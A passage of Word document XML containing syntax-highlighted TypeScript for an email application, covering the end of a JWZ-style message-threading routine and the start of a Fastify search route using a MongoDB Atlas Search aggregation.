      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">children</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(container)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Procesar References</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> refs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'references'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</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split</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\s+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialString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ref </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> refs) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cleanRef </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ref</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[&lt;&gt;]</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refContainer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> containers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(cleanRef)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refContainer) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          refContainer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cleanRef</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parent</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children</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [] }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          containers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(cleanRef</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> refContainer)</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(refContainer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> container</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">parent</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container</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">children</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">includes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(refContainer)) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Prune re-parenting según JWZ</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Agrupar por threadId</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> threads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EmailDoc[]</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email </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> emails) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> tid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">threadId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threads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">has</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(tid)) threads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(tid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      threads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(tid)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(email)</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threads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/api/src/routes/search.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { Email } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../models/Email.js'</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searchRoutes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(fastify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> FastifyInstance) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  fastify</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reply)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q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> accountId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> folderId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> dateFrom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> dateTo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> hasAttachments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NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Atlas Search aggregation</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> pipeline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">any</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$search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'email_search'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          compound</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            must</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              { text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> path</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'bodyText'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'from.address'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> fuzzy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { maxEdits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> } } }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              { equals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'accountId'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> value</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ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(accountId)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 $sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { date</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 }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      { $limit</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        $project</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          subject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from</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date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isRead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threadId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highlights</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { $meta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'searchHighlights'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          score</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
